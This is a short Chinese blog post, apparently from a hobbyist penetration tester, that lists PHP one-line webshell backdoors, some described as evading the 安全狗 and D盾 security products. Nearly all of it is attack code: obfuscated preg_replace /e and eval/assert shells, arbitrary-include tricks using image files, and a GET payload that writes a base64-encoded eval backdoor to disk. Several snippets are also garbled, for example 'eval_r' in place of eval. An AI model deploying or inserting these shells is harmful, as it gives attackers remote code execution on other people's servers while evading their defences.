站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。 整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。 看多了之后 自然可以干掉木马…… PHP一句话木马 1、$hh = 'p'.'r'.'e'.'g'.'_'.'r'.'e'.'p'.'l'.'a'.'c'.'e';$hh('/[discuz]/e',$_POST['h'],'Access');//菜刀一句话2、$filename=$_GET['xbid'];include ($filename);//危险的include函数,直接编译任何文件为php格式运行3、$reg='c'.'o'.'p'.'y';$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件4、$gzid = 'p'.'r'.'e'.'g'.'_'.'r'.'e'.'p'.'l'.'a'.'c'.'e';$gzid('/[discuz]/e',$_POST['h'],'Access');//菜刀一句话5、include ($uid);//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif//gif插一句话6、典型一句话程序后门代码php eval_r($_POST[sb])?>程序代码php @eval_r($_POST[sb])?>//容错代码程序代码php assert($_POST[sb]);?>//使用lanker一句话客户端的专家模式执行相关的php语句程序代码$_POST['sa']($_POST['sb']);?>程序代码$_POST['sa']($_POST['sb'],$_POST['sc'])?>程序代码php@preg_replace('/[email]/e',$_POST['h'],'error');?>//使用这个后,使用菜刀一句话客户端在配置连接的时候在'配置'一栏输入程序代码<O>h=@eval_r($_POST1);O>程序代码<script language='php'>@eval_r($_POST[sb])script>//绕过
超级隐蔽的PHP后门: php $_GET[a]($_GET[b]);?> 仅用GET函数就构成了木马; 利用方法: a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; 执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。
ASP一句话木马
待更新 … … 转载保留出处,实操注意细节,一人能力有限,团队作战才是王道! |
|